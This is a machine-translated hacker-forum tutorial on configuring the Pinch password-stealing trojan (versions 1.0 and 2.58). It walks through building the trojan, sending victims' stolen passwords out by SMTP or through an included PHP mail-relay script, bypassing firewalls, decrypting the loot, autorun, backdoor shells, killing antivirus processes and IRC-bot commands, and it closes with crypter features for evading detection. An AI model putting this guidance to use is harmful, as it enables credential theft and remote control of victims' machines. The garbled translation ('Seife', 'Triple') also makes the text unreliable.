This page has been robot translated, sorry for typos if any. Original content here.

Wir brechen die Seife, verwenden BrutusAET2


DAS MATERIAL IST IN DER FAMILIARISIERUNG VERÖFFENTLICHT. DER AUTOR HAT KEINE VERANTWORTUNG


-------------------------------------------------- ----------------
Teil 1. alt, aber nützlich. für Pinch 1

***********************
Pinch-Anweisung 1.0
***********************

=====
Intro
=====

Bitte wundere dich nicht, dass ich mich entschieden habe, einen solchen Artikel zu schreiben (Artikel für lamerzzz). Tatsache ist, dass in meinem Forum (http://forum.web-hack.ru) etwa alle drei Tage ein Thema erstellt wird, wie "Wie man Pinch richtig konfiguriert und verwendet?", "Wie man Pinch verwendet?" usw.

===========
Eigenschaften
===========

Dieser Trojaner ist 2003/2004 ziemlich weit verbreitet. Alle dank der Fähigkeit, eine große Anzahl von Passwörtern zu stehlen (ICQ99b-2003a / Lite / ICQ2003Pro, Miranda IM, Trillian ICQ & AIM & RQ, The Bat !, Outlook Express Outlook IE automatisch vervollständigen & ME / 2000 / XP), FAR Manager (ftp), Win / Total Commander (ftp), RAS (9x / Me / 2k / xp unterstützt)), geringes Gewicht, Open Source und einfache Erstellung einer Troy für eine bestimmte Aufgabe. Troyan hat folgende Möglichkeiten:

- Senden Sie die Konfiguration des Computers des Opfers: Betriebssystem, Betriebssystem, CPU, Festplatte, angemeldeter Benutzer, Hostname, IP
- Tastenspion (Key-Log)
- Remote-Konsole
- Firewall umgehen
- Senden aller Passwörter per E-Mail mit einem SMTP-Server
- Verschlüsselung von gestohlenen Passwörtern per Post
- Automatische Entfernung von Trojanern nach dem Start
- HTML / Textberichte
- Die Dateigröße beträgt ungefähr 10 KB
- Modulares System
- Und vieles mehr...

Troyan schrieb coban2k (http://www.cobans.net) - eine ziemlich bekannte Person in der Welt des ICQ-Hackings. Aufgrund von Problemen mit der Speicherung des Trojaners auf seinem Server war der Autor gezwungen, diese Erstellung von seiner Website zu entfernen. Leider finden fast alle Antiviren dieses Triple und es kann nur für das Opfer vparit sein, das kein Antivirusprogramm hat.

============
Packungsinhalt
============

Die folgenden Ordner und Dateien sind im Archiv (pinch_1.0.zip) mit dem Trojaner enthalten:

\ PinchBuilder.exe - Assistent zum Erstellen von Trojanern
\ Parser.exe - Programm zum Entschlüsseln von verschlüsselten E-Mails mit Passwörtern
\ readme.txt - keine Kommentare
\ Pinch \ - Hauptordner mit asm-Quellen des Trojaners und des Compilers
\ Quellen \ - andere Quellen
\ TB! 2 Plugin (Auto-Parser) \ - Ordner mit einem Plug-In für The Bat 2!, Das verschlüsselte E-Mails mit Passwörtern entschlüsselt, die an Ihre Mailbox gesendet werden
\ Quellen \ Skript \ - PHP-Skript, durch das Passwörter beim Auswählen der entsprechenden Option beim Übersetzen gesendet werden (weiter lesen)

================
Stellen Sie das Triple zusammen
================

Das Kit enthält einen speziellen Assistenten (PinchBuilder.exe), der an der Erstellung eines Trojaners für Ihre Anforderungen beteiligt ist und den Trojaner direkt auf Ihrem Computer kompiliert. Das Programm hat zwei Hauptregisterkarten: Kompilieren und Entschlüsseln. Der erste wird zum Erstellen eines Trojaners und der zweite zum Entschlüsseln von Kennwörtern verwendet (diese Registerkarte ist das Ergebnis der Operation der Parser.exe-Datei). Dann gibt es drei Unterregisterkarten: SMTP, HTTP und FILE. Sie haben die Möglichkeit, Passwörter auszugeben. Lassen Sie uns jedes genauer analysieren:

========
SMTP
========

Geben Sie im Feld Server die Adresse (Hostname / IP) des SMTP-Servers ein. Wenn Sie die Serverdomäne eingegeben haben, klicken Sie auf "Lösen", damit die Serverdomäne wie eine IP-Adresse aussehen kann. Geben Sie dann in den Feldern Von und Bis Ihre eigene Seife an. Die Schaltfläche "Testmassage senden" wird zum Senden von Testmails durch die von Ihnen festgelegten Einstellungen verwendet. Ich empfehle dringend, dass Sie es verwenden. Wenn der Brief nicht kommt, bedeutet dies, dass es Probleme beim Senden gibt (eingeschlossener Firewall, schlechter SMTP, nicht auf Beheben, usw.).

Ich möchte feststellen, dass in letzter Zeit die meisten Anbieter zu einem System wechseln, bei dem ihre Kunden nur Briefe von ihrem SMTP-Verver senden können. In solchen Fällen empfehle ich die Methode zum Senden von Briefen über HTTP.

====
HTTP
====

Wir laden die Datei \ Sources \ Script \ view.php auf den Server hoch, der PHP-Skripte unterstützt und die Funktion mail () ausführt. Geben Sie als nächstes im Feld URL den Pfad zu diesem Skript an (z. B. http://www.xss.ru/pinch.php). Geben Sie im Feld Betreff den Namen des Themas an, mit dem die Nachrichten wiederhergestellt werden sollen. Im Feld Statuscheck str sollte eine Zeile stehen, die vom Skript ausgegeben wird, nachdem es geladen wurde. In dem Skript, das mit der troy kommt, hat es einen Wert: _ret_ok_1:

<script language = "JavaScript">
window.status = "_ ret_ok_1";
</ script>

Wenn dieser Wert vom Trojaner nicht akzeptiert wird, versucht er jede Minute eine Nachricht über dieses Skript zu senden, bis er eine Zeichenfolge aus dem Feld Statuscheck str erhält. Ich empfehle, dass Sie das Skript nicht von der Standardlieferung verwenden, sondern von mir geschrieben:

<html> <body>
<? php
// Autor: Terabyte (http://www.web-hack.ru)
$ email = $ _ POST ['a'];
$ subject = $ _ POST ['b'];
$ msg = $ _ POST ['c'];
wenn (isset ($ email) und isset ($ subject) und isset ($ msg)) {
Mail ($ email, $ subject, $ msg, "Von: $ email");}
?>
<script language = "JavaScript">
window.status = "_ ret_ok_1";
</ script>
</ body> </ html>

Er macht fast das Gleiche, ist aber kompetenter geschrieben. Ein großer Vorteil bei der Verwendung dieser Methode zum Senden von Passwörtern ist die Tatsache, dass Sie Passwörter an die Firewall senden können. Wie wird das erreicht? Hier ist ein Ausschnitt aus dem Protokoll des Außenposts beim Senden des Passworts durch das Skript von meiner Website:

Prozessname: iexplorer.exe
Protokoll: HTTP
Remote-Adresse: www.web-hack.ru

Ich denke, jeder hat verstanden, wer nicht im Tank ist =) Neben den Pluspunkten kann ich die Möglichkeit hervorheben, verschlüsselte Briefe auf Ihrer Website zu schreiben und sie nicht in Seife zu schicken; die Fähigkeit, die Seife, an die die Passwörter gesendet werden, zu ändern, falls sie gelöscht wird; mit Massenversand der Troy (damit Passwörter auch von den Providern gesendet werden können, bei denen der Zugriff auf alle SMTP-Server außer ihnen deaktiviert ist)

====
DATEI
====

Diese Registerkarte legt den Pfad zu der Datei fest, in der alle Passwörter gespeichert werden. Schreiben Sie dazu im Feld Pfad den Pfad zur Datei (z. B. C: \ password.txt).

================
Compiler-Optionen
================

In diesem Bereich ist alles klar, dann müssen Sie nur die Kästchen ankreuzen, wo Sie sie brauchen. Es ist notwendig, auf das Feld Add Icon zu achten. Es zeigt den Pfad zum Icon an, aus dem der kompilierte Trojaner angezeigt wird. Ich möchte feststellen, dass ich auf meinem System (Windows XP) den Trojaner mit dieser Option nicht kompilieren konnte und deaktiviert werden musste.

Geben Sie in den Feldern Protokoll die Methode an, mit der die Kennwörter gesendet werden (SMTP / HTTP / FILE). Klicken Sie anschließend auf die Schaltfläche Übersetzen und gehen Sie zum Kompilieren des Trojaners, der mit dem Assistenten im Hauptordner gespeichert wird.

===================
Passwörter entschlüsseln
===================

Angenommen, Sie könnten dieses Dreifache lämmen, und Sie auf der Seife erhielten Passwörter aus dem Auto des Opfers. Tatsache ist, dass beim Senden die Passwörter verschlüsselt werden und erst entschlüsselt werden müssen (wenn Sie kein spezielles Plug-In zu TheBat haben!). Kopieren Sie den Text mit den verschlüsselten Passwörtern in die Zwischenablage, öffnen Sie Parser.exe (oder die Registerkarte Entschlüsseln in PinchBuilder.exe) und klicken Sie im Kontextmenü auf die Schaltfläche Prozessdaten (oder drücken Sie einfach die Tastenkombination Alt + C). Als nächstes gibt das Programm Ihnen alle vom Opfer gestohlenen Daten in einer praktischen Form aus. Dann können Sie sie speichern oder ausdrucken.

==========
Fazit
==========

Ich möchte Sie warnen, dass Sie bei der Verwendung dieses Trojaners sofort unter Artikel 273 des Strafgesetzbuches der Russischen Föderation fallen und streng bestraft werden können ;-) Ich (der Autor des Artikels) trägt keine Verantwortung für den Schaden, den manche Personen nach dem Lesen meines Artikels verursachen können.


----------------------------------------

Teil 2. Anweisung für Pinch 2.58

Ein kleiner Artikel über die elementare Konfiguration der Prise. Beurteile nicht strikt, sondern kritisiere in deinem ganzen Mund. Artikel zum Einrichten von Pinch 2.58.

Ich denke, dass es bei Crack-Ohm-Problemen kein Nukava gibt, da es eine detaillierte Hilfe und sogar ein Video gibt. Ich möchte Ihnen zeigen, wie Sie einen Drei in Builder einrichten:

SMTP-Eigenschaften
Server (Sie geben in Ihrem Fall smtp.mail.ru ein), dann drücken Sie unbedingt Resolve, so dass es in IP umgewandelt wird (übrigens muss der Betrug mit dem Internet verbunden sein)

Port - lass es wie es ist

Protokoll - Die Wahl, wie der Bericht empfangen werden soll, per SMTP, HTTP (via php) und FILE - gespeichert auf dem Computer. Die gleichen Schaltflächen (SMTP, HTTP, FILE) konfigurieren die Protokolle, aber in diesem Fall sind wir an SMTP interessiert und wir haben es bereits konfiguriert.

Die Schaltfläche TestSend sendet eine Testnachricht an die E-Mail.

Die Registerkarte PWD -preset Kennwörter aus den aufgelisteten Programmen. Das Element ENABLE PWD enthält keine Passwörter, wenn die Daw entfernt wird.
Senden Sie keinen alten Bericht - senden Sie keine alten Berichte.
Gryki Encrypt und Packing sind miteinander verbunden. FSG, UPX, MEW Auswahl der Verpackungsmethode.

Registerkarte RUN - Wählen Sie die Methoden der Autorun aus. Ich denke, du wirst es klären. Starten Sie als .... standart, DLL, Undelate Service. Navigieren Sie zum Ordner ..... oder geben Sie einen der Systemparameter an oder wählen Sie ihn aus. Auf der rechten Seite, die Spalte Werte Ich habe es nicht berührt und um ehrlich zu sein, kann ich mir vage vorstellen, warum. Von unten rechts - Umgehung der Windows-Firewall (SP2) - Umgehung der System-Firewall in SP2 (soweit ich weiß, der Mechanismus dieses Elements ist, startet es als iexplorer.exe)

Die SPY- Registerkarte - einige zusätzliche Berichte - es funktionierte nicht für mich. Der Punkt, an dem der Bildschirmspion einen Screenshot macht, hat aber für mich nicht funktioniert (srkin wurde gesendet, aber es war leer)

Die Registerkarte NET - ich habe es nicht benutzt. Es ist entworfen, um:
1. Öffnen Sie einen beliebigen Port auf dem infizierten Computer und erhalten Sie darauf Zugriff (ignorieren Sie diese Verwendung stark, wenn Sie sie nicht verschlüsseln, wenn Sie erwischt werden, erraten Sie selbst, was passieren wird)
2. Downloader - Geben Sie einen direkten Link zu einer Datei an, die heruntergeladen und ausgeführt werden soll (schätzen Sie, welche Kosten Ihr Gegner verursacht, wenn er Verkehr hat ......))))
3. AutoUpdate - automatisches Update - drei, nachdem die Arbeit beendet ist, lädt es seine Kopie herunter, und es zerstört sich selbst. Beim nächsten Laden des Systems wird eine neue Kopie gestartet (dies ist für die Zuverlässigkeit, so dass es nicht gefunden werden kann.

Tab BD (Hintertür) - Die Konsole öffnet die Shell am ausgewählten Port, Telnet Control (Telnet.exe) oder alternative Programme. (Ich habe es selbst nicht ausprobiert)

Die ECT- Registerkarte - Zusammenkleben mit einer beliebigen Datei, sowie das Symbol ... Sie können das auch tun, die Meldung erscheint ... Aber irgendetwas funktioniert nicht ...

Die KILL- Registerkarte ist die Tötung eines Prozesses (Sie können versuchen, den Virenschutz zu töten), zum Beispiel "spidernt" - und dann schaltet sich der DrWEB-Monitor aus (ich warne Sie noch nicht,

IE- Registerkarte - Legen Sie Ihre Startseite auf den Browser fest. Hinzufügen einer Seite zu Favoriten ....

Die Registerkarte WORM - sho zet taeke, ich weiß nicht ... .....

IRC-Bot- Tab - Zugriff auf den Computer über IRC:
.login Autorisierung
.die - den Bot herunterfahren
.download - Datei von URL springen
.httpd - Öffnen des Zugriffs auf die Datei über http an einem bestimmten Port
.killthread - Abschluss einer bestimmten Aufgabe
.proxy - öffnet die sox4 s am ausgewählten Port mit der ausgewählten ID
.raw - Senden von Rohtext an diesen IRC-Server
.remove - Selbstlöschung
.restart - Restart
.run - Befehle ausführen
.scan - Scannen von IP-Adressen an bestimmten offenen Ports
.shell - Öffnen der Shell an einem bestimmten Port (nicht in 95/98 / ME)
.status - Version zeigen, IP, Startdatum
.threads - Aktive Aufgaben anzeigen
.update - Selbstaktualisierender Bot von einer speziellen URL
.visit - ausgewählte URL ansehen
.url - Besuche die ausgewählte URL offen
.link - zu Favoriten hinzufügen
.sp - Machen Sie Ihre Homepage
.msg - Nachrichtenbox

Das scheint alles zu sein .... Sie drücken COMPILE und Sie haben einen Ordner im Ordner mit dem Builder ...

GUTES GLÜCK !!!!!

PS Das alles wird zur Überprüfung geschrieben und der Autor trägt keine Verantwortung für die Folgen ...



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Crypt-Funktionen:
Verwendet einen polymorphen Kryptor
Umgehen von KIS und Outpost (einschließlich der neuesten Versionen)
Selbstentfernung
Reduzierung der Größe (Normale Prise nimmt um 3-6kb ab, zupacha loader um 60-80kb)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~